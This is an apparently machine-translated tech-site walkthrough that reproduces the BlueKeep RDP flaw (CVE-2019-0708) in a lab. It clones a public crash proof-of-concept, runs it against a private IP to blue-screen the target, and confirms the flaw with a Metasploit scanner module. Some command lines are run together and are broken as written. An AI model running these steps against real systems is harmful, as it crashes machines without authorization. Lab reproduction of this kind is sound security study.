Example Analysis of CVE-2019-0708 vulnerability Exploitation recurrence 01/16 Update SLTechnology News&Howtos

Example Analysis of CVE-2019-0708 vulnerability Exploitation recurrence

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Shulou(Shulou.com)06/03 Report--

This article will explain in detail the example analysis on the recurrence of CVE-2019-0708 vulnerability exploitation. The editor thinks it is very practical, so I share it with you for reference. I hope you can get something after reading this article.

Overview of 0x00 vulnerabilities

On May 15, 2019, Windows series servers were exposed with high-risk vulnerabilities, which were exploited through remote desktop port 3389, which is comparable to WannaCry (worm).

0x01 affects version

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows Server 2003

Windows XP

Recurrence of 0x02 vulnerabilities

In order to successfully use it, the target needs to open port 3389 and the firewall needs to be turned off.

1.poc download:

CVE-2019-0708-POC GitHub:

Git clone https://github.com/n1xbyte/cve-2019-0708cd CVE-2019-0708

two。 Install the required libraries (since this library is already installed on my kali system, I won't take a screenshot here)

Pip3 install impacket

3. Execute POC to start the attack

Python3 crashpoc.py 192.168.88.150 64 # ip address system version

Then we found that the target system had a blue screen, indicating that our attack was successful.

-gorgeous dividing line-

Use MSF to reproduce vulnerabilities

Download POC to the root directory first

Git clone https://github.com/n1xbyte/cve-2019-0708cd cve-2019-0708

Start msf

Service postgresql startmsfdb initmsfconsole

Search for CVE-2019-0708 related vulnerability exploitation module

Search 0708

Let's use this auxiliary module 0 first.

Use 0

Then let's set up RHOSTS.

Set rhosts 192.168.88.150

Then we start testing below run.

Run

It turns out there's a loophole here.

So then we will try to attack using the POC we downloaded.

Python3 crashpoc.py 192.168.88.150 64

Then we found that the attack was successful and the system blue screen again.

This is the end of the article on "sample Analysis of CVE-2019-0708 vulnerability recovery". I hope the above content can be helpful to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.